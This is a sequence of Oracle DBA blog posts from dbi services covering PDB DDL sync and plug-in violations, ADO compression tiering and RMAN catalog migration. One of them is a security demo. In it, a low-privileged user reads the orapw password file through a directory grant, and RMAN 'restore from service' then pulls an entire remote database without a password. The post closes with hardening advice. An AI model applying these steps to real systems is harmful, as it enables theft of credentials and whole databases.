SQL> select con_id,scnwrp,scnbas,ctime,name,auxname1,auxname2,opcode,replay#,sqlstmt from containers(pdb_sync$) where con_id>1 and bitand(flags,8)!=8 order by con_id,replay#;
 
CON_ID SCNWRP SCNBAS CTIME NAME AUXNAME1 AUXNAME2 OPCODE REPLAY# SQLSTMT
------ ------ ------ ----- ---- -------- -------- ------ ------- -------
3 0 0 26-jan-17 01:53:02 PDB$LASTREPLAY -1 11
4 0 0 26-jan-17 01:53:02 PDB$LASTREPLAY -1 10

But I don’t have a USERS tablespace in PDB2, so the replay will fail:

SQL> alter pluggable database PDB2 close;
Pluggable database PDB2 altered.
 
SQL> alter pluggable database PDB2 open;
ORA-24344: success with compilation error
Pluggable database PDB2 altered.

This is a warning only. The SQlcl feedback is a bit misleading, mentioning a compilation error because this is where we used to have warnings, but the SQl*Plus message is more clear:

SQL> alter pluggable database PDB2 open;
Warning: PDB altered with errors.

The PDB2 cannot be left closed, because you need to create a tablespace here. But it cannot be opened to everyone, because it is not in sync with CDB$ROOT. So what happens is that the PDB is opened in restricted mode:

SQL> show pdbs
 
CON_ID CON_NAME OPEN MODE RESTRICTED
------ -------- ---- ---- ----------
2 PDB$SEED READ ONLY NO
3 PDB1 READ WRITE NO
4 PDB2 READ WRITE YES

Note that if you look at PDB_SYNC$ in the PDB at that time, it looks like REPLAY#=11 has increased but you also see rows for the statement that has to be run. You have to connect to the PDB because containers() do not run in restricted session containers:

SQL> alter session set container=PDB2;
Session altered.
 
SQL> select con_id,scnwrp,scnbas,ctime,name,auxname1,auxname2,opcode,replay#,sqlstmt from containers(pdb_sync$) where con_id>1 and bitand(flags,8)!=8 order by con_id,replay#;
 
CON_ID SCNWRP SCNBAS CTIME NAME AUXNAME1 AUXNAME2 OPCODE REPLAY# SQLSTMT
------ ------ ------ ----- ---- -------- -------- ------ ------- -------
4 0 0 26-jan-17 01:53:02 PDB$LASTREPLAY -1 11
4 0 1469022 29-dec-17 09:27:02 C##USER1 SYS 5 11 alter user C##USER1 default tablespace USERS^@
 
SQL> alter session set container=CDB$ROOT;
Session altered.

Actually, the attempt to sync has inserted the statements and pushed the last replay indicator. Now, the PDB has all information to do a sync without the need to go to CDB$ROOT. The DDL was not replayed, but has been stored locally. When the sync will be successful, statements will be removed from the local PDB_SYNC$ leaving only the LASTREPLAY indicator.

PDB_PLUG_IN_VIOLATIONS

More info about the warning is stored in PDB_ALERT$ which you query from PDB_PLUG_IN_VIOLATIONS (the strange name reminds the TRANSPORT_SET_VIOLATIONS view used by DBMS_TTS):

SQL> select name, cause, type, status,action,message,time from pdb_plug_in_violations;
 
NAME CAUSE TYPE STATUS ACTION MESSAGE TIME
---- ----- ---- ------ ------ ------- -------------------------------
PDB2 Sync Failure ERROR PENDING Sync PDB failed with ORA-959 during 'alter user C##USER1 default tablespace USERS' 29-DEC-17 09.27.03.266780000 PM

Here you have the statement that failed and the error number, but no recommended ACTION. However, ORA-959 is “tablespace ‘%s’ does not exist” which gives a clue about the problem encountered.

As the PDB is opened a DBA (with RESTRICTED SESSION privilege) can add the tablespace:

SQL> alter session set container=PDB2;
Session altered.
 
SQL> create tablespace USERS datafile '/u01/oradata/CDB2/PDB2/users.dbf' size 5M;
Tablespace USERS created.

But you cannot simply disable restricted session:

SQL> alter system disable restricted session;
SQL> alter system disable restricted session;
 
Error starting at line : 74 File @ common-users-pdb-sync.sql
In command -
alter system disable restricted session
Error report -
ORA-65144: ALTER SYSTEM DISABLE RESTRICTED SESSION is not permitted
65144. 00000 - "ALTER SYSTEM DISABLE RESTRICTED SESSION is not permitted"
*Cause: An attempt was made to disable a restricted session while an unresolved error existed in PDB_PLUG_IN_VIOLATIONS.
*Action: Resolve all of the errors before trying to disable a restricted session.

One solution is to close and open the PDB to get the DDL replay:
SQL> alter session set container=CDB$ROOT;
Session altered.
SQL> alter pluggable database PDB2 close;
Pluggable database PDB2 altered.
SQL> alter pluggable database PDB2 open;
Pluggable database PDB2 altered.

The other solution is to call DBMS_PDB.SYNC_PDB and disable restricted mode:

SQL> exec dbms_pdb.sync_pdb; commit;
PL/SQL procedure successfully completed.
 
SQL> alter system disable restricted session;
System DISABLE altered.

In both case, no warning here, and no restricted mode:

SQL> show pdbs
 
CON_ID CON_NAME OPEN MODE RESTRICTED
------ -------- ---- ---- ----------
2 PDB$SEED READ ONLY NO
3 PDB1 READ WRITE NO
4 PDB2 READ WRITE NO

and the PDB_PLUG_IN_VIOLATIONS is updated to flag the issue as resolved:

SQL> select name, cause, type, status,action,message,time from pdb_plug_in_violations;
 
NAME CAUSE TYPE STATUS ACTION MESSAGE TIME
---- ----- ---- ------ ------ ------- -------------------------------
PDB2 Sync Failure ERROR RESOLVED Sync PDB failed with ORA-959 during 'alter user C##USER1 default tablespace USERS' 29-DEC-17 09.27.04.093659000 PM

At that time, the local PDB_SYNC$ table in PDB2 contains only the PDB$LASTREPLAY row, with the same value as in the CDB$ROOT table. The rows with the statements have been deleted once the DDL has been successfully replayed:

SQL> select con_id,scnwrp,scnbas,ctime,name,auxname1,auxname2,opcode,replay#,sqlstmt from containers(pdb_sync$) where con_id>1 and bitand(flags,8)!=8 order by con_id,replay#;
 
CON_ID SCNWRP SCNBAS CTIME NAME AUXNAME1 AUXNAME2 OPCODE REPLAY# SQLSTMT
------ ------ ------ ----- ---- -------- -------- ------ ------- -------
4 0 0 26-jan-17 01:53:02 PDB$LASTREPLAY -1 11

So what?

The mechanism is simple: record what is done in CDB$ROOT, replicate it in PDBs when possible (opened read-write) and try to replay it, mark the last replay step. For containers that were not writeable, at open, the DDL is replicated on the PDBs that lag being CDB$ROOT and replay step is updated. Then the DDL is replayed. When sucessful, the statement is removed from the replicated DDL. When it fails, you get a warning, and a message in PDB_PLUG_IN_VIOLATIONS, and the PDB is opened in restricted session mode to let you solve the problem.
If you can fix the issue so that the DDL to be replayed is successful, then you can just sync and disable restricted session, or simply close and re-open the PDB.
If you can’t fix it I suppose you need to hack the statements in the local PDB_SYNC$, with Oracle Support agreement of course, and make sure that you arrive to a state which is consistent with the other containers, especially CDB$ROOT.

 

Cet article 12c Multitenant internals: PDB_PLUG_IN_VIOLATIONS est apparu en premier sur Blog dbi services.

Keep your orapw password file secure

$
0
0

This is a small demo I did when I’ve found a database password file (orapw) lying around in /tmp with -rw-rw-rw- permissions, to show how this is a bad idea. People think that the orapw file only contains hashes to validate a password given, and forget that it can be used to connect to a remote database without password.

I can easily imagine why the orapwd was there in /tmp. To build a standby database, you need to copy the password file to the standby server. If you don’t have direct access to the oracle user, but only a sudo access for ‘security reasons’, you can’t scp easily. Then you copy the file to /tmp, make it readable by all users, and you can scp with your user.

In this demo I don’t even have access to the host. I’ve only access to connect to a PDB with the SCOTT users, reated with utlsampl.sql, with those additional privileges, a read access on $ORACLE_HOME/dbs:

SQL> connect sys/oracle@//192.168.56.122/PDB1 as sysdba

Connected.

SQL> create or replace directory DBS as '/u01/app/oracle/product/12.2.0/dbhome_1/dbs';

Directory DBS created.

SQL> grant read on directory DBS to SCOTT;

Grant succeeded.
People tend to grant many privileges, and think that a read access on a directory which is supposed to contain only configuration files is harmless. Let’s see what you can do from another server.

Get the orapw file from a remote connection

I connect with SCOTT which can read from ORACLE_HOME/dbs:

SQL> connect scott/tiger@//192.168.56.122/PDB1

Connected.

SQL> show user

USER is "SCOTT"

SQL> select * from all_directories;

OWNER DIRECTORY_NAME DIRECTORY_PATH ORIGIN_CON_ID

----- -------------- -------------- -------------

SYS DBS /u01/app/oracle/product/12.2.0/dbhome_1/dbs 4
I create a table to read this file (other possibilities utl_tile, external tables,…):

SQL> create table DEMO ( b blob );

Table DEMO created.

SQL> insert into demo values ( bfilename('DBS','orapwCDB1') );

1 row inserted.
I’m on another server with the same version of Oracle Database software installed.

I use sqlplus to retrieve the server file to my client:

sqlcl -s scott/tiger@//192.168.56.120/PDB1 < $ORACLE_HOME/dbs/orapwCDB1

set pages 0 lin 17000 long 1000000000 longc 16384

select * from DEMO;

exit

EOF
This (documented by Laurent Schneider) uses sqlplus to display the BLOB variable as hexadecimal code and xdd (installed with vim-common) to revert it to binary.

So, on my server I have a copy of the database password file for the database I want to steal:

[oracle@VM122 ~]$ strings /u01/app/oracle/product/12.2.0/dbhome_1/dbs/orapwCDB1

ORACLE Remote Password file

X)l)|

SYSDG

+933k\

SYSBACKUP

f ts6 $9

SYSKM
Pull

A nice feature of 12c is the ability to pull backups from a service. With this, it is the destination that connects to the source. I have diagrams to explain here). It is an easy alternative to RMAN DUPLICATE (see MOS Doc ID 2283978.1 Creating a Physical Standby database using RMAN restore from service). And one difference is that you don’t have to provide the password:

I prepare a small init.ora and directory for the datafiles

echo "db_name=CDB1" > $ORACLE_HOME/dbs/initCDB1.ora

mkdir -p /u01/oradata/CDB1
I’m still on my server with the copy of the remote orapw file and a network access to the source database and I just restore it, without the need for a password:

RMAN> connect target /

connected to target database (not started)
I start a local instance:

RMAN> startup nomount force

Oracle instance started

Total System Global Area 859832320 bytes

Fixed Size 8798552 bytes

Variable Size 784338600 bytes

Database Buffers 58720256 bytes

Redo Buffers 7974912 bytes
I restore the controlfile:

RMAN> restore controlfile from service '//192.168.56.122/CDB1';

Starting restore at 05-JAN-18

using target database control file instead of recovery catalog

allocated channel: ORA_DISK_1

channel ORA_DISK_1: SID=262 device type=DISK

channel ORA_DISK_1: starting datafile backup set restore

channel ORA_DISK_1: using network backup set from service //192.168.56.122/CDB1

channel ORA_DISK_1: restoring control file

channel ORA_DISK_1: restore complete, elapsed time: 00:00:02

output file name=/u01/oradata/CDB1/control01.ctl

output file name=/u01/fast_recovery_area/CDB1/control02.ctl

Finished restore at 05-JAN-18
That’s the interesting part because it has to be connected, at least as SYSOPER, to the source database but I didn’t provide any password.

I mount this controlfile locally:

RMAN> alter database mount;

Statement processed

released channel: ORA_DISK_1
And now it is easy to pull the whole database (the CDB with all its PDBs) to my local server:

RMAN> restore database from service '//192.168.56.122/CDB1';

Starting restore at 05-JAN-18

Starting implicit crosscheck backup at 05-JAN-18

allocated channel: ORA_DISK_1

channel ORA_DISK_1: SID=262 device type=DISK

Crosschecked 6 objects

Finished implicit crosscheck backup at 05-JAN-18

Starting implicit crosscheck copy at 05-JAN-18

using channel ORA_DISK_1

Finished implicit crosscheck copy at 05-JAN-18

searching for all files in the recovery area

cataloging files...

cataloging done

List of Cataloged Files

=======================

File Name: /u01/fast_recovery_area/CDB1/autobackup/2018_01_04/o1_mf_s_964524009_f4vzyt59_.bkp

File Name: /u01/fast_recovery_area/CDB1/archivelog/2018_01_04/o1_mf_1_15_f4w5vv19_.arc

File Name: /u01/fast_recovery_area/CDB1/archivelog/2018_01_04/o1_mf_1_16_f4wmm0t8_.arc

File Name: /u01/fast_recovery_area/CDB1/archivelog/2018_01_04/o1_mf_1_14_f4vzjdl1_.arc

using channel ORA_DISK_1

channel ORA_DISK_1: starting datafile backup set restore

channel ORA_DISK_1: using network backup set from service //192.168.56.122/CDB1

channel ORA_DISK_1: specifying datafile(s) to restore from backup set

channel ORA_DISK_1: restoring datafile 00001 to /u01/oradata/CDB1/system01.dbf

channel ORA_DISK_1: restore complete, elapsed time: 00:00:16

channel ORA_DISK_1: starting datafile backup set restore

...
So what?

This is not an issue and is totally expected. In a Data Guard configuration, the primary and standby database have to communicate with each others and then need a passwordless authentication. This is done with the password file, and this is the reason why you need to copy it rather than just create another one with the same passwords.

So, there is more than just a hash of the password (which is required to validate a password) and probably includes a key (randomly generated when you create the password file) used for passwordless authentication.

Then, be careful, and do not give read access to the orapw files. You must secure them in the same way as a ssh key or an encryption wallet. and this include:

  • Do not leave a copy of the orapw file in a shared location
  • Be careful with grants on directories, even in READ
  • Do not grant CREATE ANY DIRECTORY except for a PDB with PATH_PREFIX lockdown
 

Cet article Keep your orapw password file secure est apparu en premier sur Blog dbi services.

Automatic Data Optimization Part I : Compression Tiering

$
0
0

Nowadays data are increasing more and more. And some challenges we can face can be how to reduce storage costs and how to improve performance. With Oracle 12c, the feature Automatic Data Optimization (ADO) can help us.
In this first blog we will see how we can use ADO to compress data under predefined conditions.
ADO is part of Information Lifecycle Management (ILM). Note that ADO requires Advanced Compression Option.
In this article we are using oracle a 12.1.0.2 non-CDB database.
First let’s create the user we will use for the demonstration

SQL> create user app identified by app default tablespace users temporary tablespace temp;
User created.
.
SQL> grant create session,create table,alter tablespace,select any dictionary,unlimited tablespace to app;
Grant succeeded.

Now with this user let’s create a table and let’s insert some data
SQL> show user
USER is "APP"
SQL> create table article(idart number,designation varchar2(20));
Table created.
.
SQL> select count(*) from article;
COUNT(*)
----------
1048576

What we will demonstrate is how data in table ARTICLE can be automatically compressed if they are not modified within the last 30 days for example. It’s just an example and there are many other conditions.
First let’s verify that the compression attribute of the table article is disabled
SQL> show user
USER is "APP"
SQL> SELECT compression, compress_for FROM user_tables WHERE table_name = 'ARTICLE';
COMPRESS COMPRESS_FOR
-------- ------------------------------
DISABLED

We can also confirm that there is no compression in the table using this oracle script.
[oracle@serverora1 ]$ cat comp_art.sql
SELECT CASE compression_type
WHEN 1 THEN 'No Compression'
WHEN 2 THEN 'Advanced compression level'
WHEN 4 THEN 'Hybrid Columnar Compression for Query High'
WHEN 8 THEN 'Hybrid Columnar Compression for Query Low'
WHEN 16 THEN 'Hybrid Columnar Compression for Archive High'
WHEN 32 THEN 'Hybrid Columnar Compression for Archive Low'
WHEN 64 THEN 'Compressed row'
WHEN 128 THEN 'High compression level for LOB operations'
WHEN 256 THEN 'Medium compression level for LOB operations'
WHEN 512 THEN 'Low compression level for LOB operations'
WHEN 1000 THEN 'Minimum required number of LOBs in the object for which LOB compression ratio is to be estimated'
WHEN 4096 THEN 'Basic compression level'
WHEN 5000 THEN 'Maximum number of LOBs used to compute the LOB compression ratio'
WHEN 1000000 THEN 'Minimum required number of rows in the object for which HCC ratio is to be estimated'
WHEN -1 THEN 'To indicate the use of all the rows in the object to estimate HCC ratio'
WHEN 1 THEN 'Identifies the object whose compression ratio is estimated as of type table'
ELSE 'Unknown Compression Type'
END AS compression_type, n as num_rows
FROM (SELECT compression_type, Count(*) n
FROM (SELECT dbms_compression.Get_compression_type(USER, 'ARTICLE', ROWID) AS COMPRESSION_TYPE
FROM app.article)
GROUP BY compression_type
);
[oracle@serverora1 ]$

Below we can see that there is no compressed data
SQL> col COMPRESSION_TYPE for a20
SQL> @comp_art
COMPRESSION_TYPE NUM_ROWS
-------------------- ----------
No Compression 1048576

To use ADO for compression, the Heat Map must be enabled. Indeed once enabled, Heat Map will collect statistics required for ADO actions. All accesses are tracked by the in-memory activity tracking module. So let’s enable the Heat Map at instance level

SQL> show parameter heat
NAME TYPE VALUE
------------------------------------ ----------- ------------------------------
heat_map string OFF
.
SQL> alter system set heat_map=ON scope=both;
System altered.
.
SQL> show parameter heat
NAME TYPE VALUE
------------------------------------ ----------- ------------------------------
heat_map string ON

By default the policy time is specified in days. If we query the DBA_ILMPARAMETERS, the value for POLICY TIME determines if ADO policies are specified in seconds or days. Values are 1 for seconds or 0 for days (default).

SQL> col name for a20
SQL> select * from DBA_ILMPARAMETERS;
NAME VALUE
-------------------- ----------
ENABLED 1
RETENTION TIME 30
JOB LIMIT 2
EXECUTION MODE 2
EXECUTION INTERVAL 15
TBS PERCENT USED 85
TBS PERCENT FREE 25
POLICY TIME 0
8 rows selected.

But in our demonstration we will not wait 30 days, so we will set the policy time in seconds instead of days and then if we specify 30 days this will mean 30 seconds.

SQL> EXEC dbms_ilm_admin.customize_ilm(dbms_ilm_admin.POLICY_TIME,dbms_ilm_admin.ILM_POLICY_IN_SECONDS);
PL/SQL procedure successfully completed.
.
SQL> select * from DBA_ILMPARAMETERS;
NAME VALUE
-------------------- ----------
ENABLED 1
RETENTION TIME 30
JOB LIMIT 2
EXECUTION MODE 2
EXECUTION INTERVAL 15
TBS PERCENT USED 85
TBS PERCENT FREE 25
POLICY TIME 1
8 rows selected.
SQL>

Before adding the ADO policy, we can verify that heat map statistics are already collected.

SELECT OBJECT_NAME, to_char(TRACK_TIME,'DD-MON-YYYY HH24:MI:SS'), SEGMENT_WRITE "Seg_write",
SEGMENT_READ "Seg_read", FULL_SCAN, LOOKUP_SCAN
FROM v$heat_map_segment WHERE object_name='ARTICLE';
.
OBJECT_NAME TO_CHAR(TRACK_TIME,'DD-MON-YY Seg Seg FUL LOO
------------------------------ ----------------------------- --- --- --- ---
ARTICLE 08-JAN-2018 17:02:21 NO NO YES NO
SQL>

Now let’s add a segment level row compression policy on ARTICLE table that will compress the segment when no modification on the segment will have occurred in the last 30 days (considered as 30 seconds due to the policy time).

SQL> show user
USER is "APP"
SQL> ALTER TABLE app.article ILM ADD POLICY ROW STORE COMPRESS ADVANCED SEGMENT AFTER 30 DAYS OF NO MODIFICATION;
Table altered.
SQL>

We can use the user_ilmdatamovementpolicies and user_ilmobjects with user app to verify the policy.

SQL> show user
USER is "APP"
SQL> SELECT policy_name, action_type, scope, compression_level, condition_type, condition_days FROM user_ilmdatamovementpolicies ORDER BY policy_name;
POLICY_NAME ACTION_TYPE SCOPE COMPRESSION_LEVEL CONDITION_TYPE CONDITION_DAYS
--------------- ----------- ------- ----------------- ---------------------- --------------
P45 COMPRESSION SEGMENT ADVANCED LAST MODIFICATION TIME 30
.
SQL> SELECT policy_name, object_name, enabled FROM user_ilmobjects;
POLICY_NAME OBJECT_NAME ENA
--------------- -------------------- ---
P45 ARTICLE YES

Flush the heat map statistics from memory to disk and let’s wait 30 days ( in fact 30 seconds because don’t forget the policy_time was changed to seconds instead of days). Can be also sometimes useful to gather the statistics of the table

SQL> EXEC dbms_ilm.flush_all_segments;
PL/SQL procedure successfully completed.
SQL>

By default ADO policies are automatically triggered during maintenance window. But in this demonstration we are going to manually execute the policy without waiting the maintenance window.

SQL> show user
USER is "APP"
SQL> DECLARE
v_executionid number;
BEGIN
dbms_ilm.execute_ILM (ILM_SCOPE => dbms_ilm.SCOPE_SCHEMA,
execution_mode => dbms_ilm.ilm_execution_offline,
task_id => v_executionid);
END;
/
PL/SQL procedure successfully completed.
SQL>

Some info about the job can be obtained in the following views

SQL> SELECT task_id, start_time as start_time FROM user_ilmtasks order by 1;
TASK_ID
----------
START_TIME
---------------------------------------------------------------------------
26
08-JAN-18 05.28.45.788076 PM
SQL>
.
SQL> SELECT task_id, job_name, job_state, completion_time completion
FROM user_ilmresults ORDER BY 1 ;
TASK_ID
----------
JOB_NAME
--------------------------------------------------------------------------------
JOB_STATE
-----------------------------------
COMPLETION
---------------------------------------------------------------------------
26
ILMJOB98
COMPLETED SUCCESSFULLY
08-JAN-18 05.28.49.368009 PM

We can see that job run successfully. And we can verify that compression in table ARTICLE is now enabled

SQL> SELECT compression, compress_for FROM user_tables WHERE table_name = 'ARTICLE';
COMPRESS COMPRESS_FOR
-------- ------------------------------
ENABLED ADVANCED
SQL>

And we also can see that all rows are compressed.

SQL> col COMPRESSION_TYPE for a20
SQL> @comp_art.sql
COMPRESSION_TYPE NUM_ROWS
-------------------- ----------
Advanced compression 1048576
level

Conclusion : In this first part we have seen that how ADO can help us for compression. In a second post we will talk about data movement with ADO.

 

Cet article Automatic Data Optimization Part I : Compression Tiering est apparu en premier sur Blog dbi services.

ORACLE 11g to 12c RMAN catalog migration

$
0
0

This is a small migration demo of a 11g catalog (RCAT11G) to a new 12c catalog (RCAT12c).

Demo databases environments have been easily managed thanks to DBI DMK tool.

oracle@vmreforadg01:/home/oracle/ [RCAT11G] sqh
SQL*Plus: Release 11.2.0.4.0 

oracle@vmtestoradg1:/home/oracle/ [RCAT12C] sqh
SQL*Plus: Release 12.2.0.1.0

 

Current configuration

Displaying the list of databases registered in the RCAT11g catalog.

SQL> select instance_name from v$instance;

INSTANCE_NAME
----------------
RCAT11G

SQL> select * from rcat.rc_database;

    DB_KEY  DBINC_KEY       DBID NAME     RESETLOGS_CHANGE# RESETLOGS
---------- ---------- ---------- -------- ----------------- ---------
        41         42 3287252358 DB2TEST1                 1 05-JAN-18
         1          2   65811618 DB1TEST1                 1 05-JAN-18

 

Displaying the list of databases registered in the RCAT12c catalog.

SQL> select instance_name from v$instance;

INSTANCE_NAME
----------------
RCAT12C

SQL>  select * from rcat.rc_database;

no rows selected

 

Verifying existing backup meta data on RCAT11g.

SQL> select db_name, name from rcat.rc_datafile;

DB_NAME                        NAME
------------------------------ ------------------------------------------------------------
DB2TEST1                       /u01/oradata/DB2TEST11G/system01DB2TEST11G.dbf
DB2TEST1                       /u01/oradata/DB2TEST11G/sysaux01DB2TEST11G.dbf
DB2TEST1                       /u01/oradata/DB2TEST11G/undotbs01DB2TEST11G.dbf
DB2TEST1                       /u01/oradata/DB2TEST11G/users01DB2TEST11G.dbf
DB1TEST1                       /u01/oradata/DB1TEST11G/system01DB1TEST11G.dbf
DB1TEST1                       /u01/oradata/DB1TEST11G/sysaux01DB1TEST11G.dbf
DB1TEST1                       /u01/oradata/DB1TEST11G/undotbs01DB1TEST11G.dbf
DB1TEST1                       /u01/oradata/DB1TEST11G/users01DB1TEST11G.dbf

8 rows selected.

 

Migrating RCAT11g to RCAT12c

Importing RCAT11g catalog data into RCAT12c.

oracle@vmtestoradg1:/home/oracle/ [RCAT12C] rman catalog rcat/manager
Recovery Manager: Release 12.2.0.1.0

RMAN> import catalog rcat/manager@RCAT11G;

Starting import catalog at 05-JAN-2018 13:39:56
connected to source recovery catalog database
PL/SQL package RCAT.DBMS_RCVCAT version 11.02.00.04 in IMPCAT database is too old
RMAN-00571: ===========================================================
RMAN-00569: =============== ERROR MESSAGE STACK FOLLOWS ===============
RMAN-00571: ===========================================================
RMAN-03002: failure of import catalog command at 01/05/2018 13:39:56
RMAN-06429: IMPCAT database is not compatible with this version of RMAN

 

When using IMPORT CATALOG, the version of the source recovery catalog schema must be equal to the current version of the destination recovery catalog schema. We, therefore, first need to upgrade RCAT11g catalog schema.

oracle@vmtestoradg1:/home/oracle/ [RCAT12C] sqlplus sys/manager@RCAT11G as sysdba
SQL*Plus: Release 12.2.0.1.0

SQL> @/oracle/u01/app/oracle/product/12.2.0/db_1_0/rdbms/admin/dbmsrmansys.sql

PL/SQL procedure successfully completed.


PL/SQL procedure successfully completed.


PL/SQL procedure successfully completed.


Grant succeeded.


Grant succeeded.


Grant succeeded.


Grant succeeded.


Grant succeeded.


PL/SQL procedure successfully completed.
oracle@vmtestoradg1:/home/oracle/ [RCAT12C] rman target sys/manager catalog rcat/manager@RCAT11G
Recovery Manager: Release 12.2.0.1.0

connected to target database: RCAT12C (DBID=426487514)
connected to recovery catalog database

RMAN> upgrade catalog;

recovery catalog owner is RCAT
enter UPGRADE CATALOG command again to confirm catalog upgrade

RMAN> upgrade catalog;

recovery catalog upgraded to version 12.02.00.01
DBMS_RCVMAN package upgraded to version 12.02.00.01
DBMS_RCVCAT package upgraded to version 12.02.00.01.

 

Verifying new version of RCAT11g catalog.

oracle@vmreforadg01:/u00/app/oracle/network/admin/ [RCAT11G] sqlplus rcat/manager
SQL*Plus: Release 11.2.0.4.0

SQL> select * from rcver;

VERSION
------------
12.02.00.01

 

Importing RCAT11g catalog data into RCAT12c catalog.

oracle@vmtestoradg1:/u01/app/oracle/network/admin/ [RCAT12C] rman catalog rcat/manager
Recovery Manager: Release 12.2.0.1.0

connected to recovery catalog database

RMAN> list db_unique_name all;


RMAN> import catalog rcat/manager@RCAT11G;

Starting import catalog at 05-JAN-2018 15:21:48
connected to source recovery catalog database
import validation complete
database unregistered from the source recovery catalog
Finished import catalog at 05-JAN-2018 15:21:52

RMAN> list db_unique_name all;


List of Databases
DB Key  DB Name  DB ID            Database Role    Db_unique_name
------- ------- ----------------- ---------------  ------------------
2       DB1TEST1 65811618         PRIMARY          DB1TEST11G
42      DB2TEST1 3287252358       PRIMARY          DB2TEST11G

 

Verifying new configuration

Displaying the list of databases registered in the RCAT11g catalog.

oracle@vmreforadg01:/u00/app/oracle/network/admin/ [RCAT11G] sqh
SQL*Plus: Release 11.2.0.4.0

SQL> select * from rcat.rc_database;

no rows selected

SQL> select db_name, name from rcat.rc_datafile;

no rows selected

SQL> select DB_KEY, DB_ID, START_TIME, COMPLETION_TIME from RCAT.RC_BACKUP_SET;

no rows selected

 

Displaying the list of databases registered in the RCAT12c catalog.

oracle@vmtestoradg1:/u01/app/oracle/network/admin/ [RCAT12C] sqh
SQL*Plus: Release 12.2.0.1.0

SQL> select * from rcat.rc_database;

    DB_KEY  DBINC_KEY       DBID NAME                          RESETLOGS_CHANGE# RESETLOGS FINAL_CHANGE#
---------- ---------- ---------- ----------------------------- ----------------- --------- -------------
        42         43 3287252358 DB2TEST1                                      1 05-JAN-18
         2          3   65811618 DB1TEST1                                      1 05-JAN-18

SQL> select db_name, name from rcat.rc_datafile;

DB_NAME                        NAME
------------------------------ ------------------------------------------------------------
DB2TEST1                       /u01/oradata/DB2TEST11G/users01DB2TEST11G.dbf
DB2TEST1                       /u01/oradata/DB2TEST11G/system01DB2TEST11G.dbf
DB1TEST1                       /u01/oradata/DB1TEST11G/system01DB1TEST11G.dbf
DB1TEST1                       /u01/oradata/DB1TEST11G/sysaux01DB1TEST11G.dbf
DB2TEST1                       /u01/oradata/DB2TEST11G/undotbs01DB2TEST11G.dbf
DB2TEST1                       /u01/oradata/DB2TEST11G/sysaux01DB2TEST11G.dbf
DB1TEST1                       /u01/oradata/DB1TEST11G/undotbs01DB1TEST11G.dbf
DB1TEST1                       /u01/oradata/DB1TEST11G/users01DB1TEST11G.dbf

8 rows selected.

SQL> select DB_KEY, DB_ID, START_TIME, COMPLETION_TIME from RCAT.RC_BACKUP_SET;

    DB_KEY      DB_ID START_TIME          COMPLETION_TIME
---------- ---------- ------------------- -------------------
        42 3287252358 05/01/2018 11:32:00 05/01/2018 11:32:00
        42 3287252358 05/01/2018 11:32:02 05/01/2018 11:32:06
        42 3287252358 05/01/2018 11:32:09 05/01/2018 11:32:10
        42 3287252358 05/01/2018 11:32:12 05/01/2018 11:32:12
        42 3287252358 05/01/2018 15:33:37 05/01/2018 15:33:37
        42 3287252358 05/01/2018 15:33:40 05/01/2018 15:33:45
        42 3287252358 05/01/2018 15:33:47 05/01/2018 15:33:48
        42 3287252358 05/01/2018 15:33:50 05/01/2018 15:33:50
         2   65811618 05/01/2018 11:29:36 05/01/2018 11:29:36
         2   65811618 05/01/2018 11:29:38 05/01/2018 11:29:43
         2   65811618 05/01/2018 11:29:45 05/01/2018 11:29:46
         2   65811618 05/01/2018 11:29:48 05/01/2018 11:29:48
         2   65811618 05/01/2018 15:31:17 05/01/2018 15:31:17
         2   65811618 05/01/2018 15:31:19 05/01/2018 15:31:24
         2   65811618 05/01/2018 15:31:26 05/01/2018 15:31:27
         2   65811618 05/01/2018 15:31:29 05/01/2018 15:31:29
         2   65811618 05/01/2018 15:44:47 05/01/2018 15:44:47
         2   65811618 05/01/2018 15:44:49 05/01/2018 15:44:52
         2   65811618 05/01/2018 15:44:56 05/01/2018 15:44:57
         2   65811618 05/01/2018 15:45:00 05/01/2018 15:45:00
         2   65811618 05/01/2018 15:46:53 05/01/2018 15:46:53
         2   65811618 05/01/2018 15:46:55 05/01/2018 15:47:00
         2   65811618 05/01/2018 15:47:02 05/01/2018 15:47:03
         2   65811618 05/01/2018 15:47:05 05/01/2018 15:47:05

24 rows selected.

 

Checking new backup meta data to be recorded in RCAT12c catalog

Generating a new backup.

oracle@vmreforadg02:/u00/app/oracle/network/admin/ [DB2TEST11G] export NLS_DATE_FORMAT="DD/MM/YYYY HH24:MI:SS"
oracle@vmreforadg02:/u00/app/oracle/network/admin/ [DB2TEST11G] rmanh
Recovery Manager: Release 11.2.0.4.0

RMAN> connect target /

connected to target database: DB2TEST1 (DBID=3287252358)

RMAN> connect catalog rcat/manager@rcat12c

connected to recovery catalog database

RMAN> backup database plus archivelog;

Starting backup at 05/01/2018 15:51:14
current log archived
allocated channel: ORA_DISK_1
channel ORA_DISK_1: SID=32 device type=DISK
channel ORA_DISK_1: starting archived log backup set
channel ORA_DISK_1: specifying archived log(s) in backup set
input archived log thread=1 sequence=32 RECID=1 STAMP=964611118
input archived log thread=1 sequence=33 RECID=2 STAMP=964611131
input archived log thread=1 sequence=34 RECID=3 STAMP=964625616
input archived log thread=1 sequence=35 RECID=4 STAMP=964625629
input archived log thread=1 sequence=36 RECID=5 STAMP=964626674
channel ORA_DISK_1: starting piece 1 at 05/01/2018 15:51:16
channel ORA_DISK_1: finished piece 1 at 05/01/2018 15:51:17
piece handle=/u90/fast_recovery_area/DB2TEST11G/backupset/2018_01_05/o1_mf_annnn_TAG20180105T155116_f4z474b0_.bkp tag=TAG20180105T155116 comment=NONE
channel ORA_DISK_1: backup set complete, elapsed time: 00:00:01
Finished backup at 05/01/2018 15:51:17

Starting backup at 05/01/2018 15:51:17
using channel ORA_DISK_1
channel ORA_DISK_1: starting full datafile backup set
channel ORA_DISK_1: specifying datafile(s) in backup set
input datafile file number=00001 name=/u01/oradata/DB2TEST11G/system01DB2TEST11G.dbf
input datafile file number=00003 name=/u01/oradata/DB2TEST11G/undotbs01DB2TEST11G.dbf
input datafile file number=00002 name=/u01/oradata/DB2TEST11G/sysaux01DB2TEST11G.dbf
input datafile file number=00004 name=/u01/oradata/DB2TEST11G/users01DB2TEST11G.dbf
channel ORA_DISK_1: starting piece 1 at 05/01/2018 15:51:18
channel ORA_DISK_1: finished piece 1 at 05/01/2018 15:51:25
piece handle=/u90/fast_recovery_area/DB2TEST11G/backupset/2018_01_05/o1_mf_nnndf_TAG20180105T155117_f4z476gv_.bkp tag=TAG20180105T155117 comment=NONE
channel ORA_DISK_1: backup set complete, elapsed time: 00:00:07
channel ORA_DISK_1: starting full datafile backup set
channel ORA_DISK_1: specifying datafile(s) in backup set
including current control file in backup set
including current SPFILE in backup set
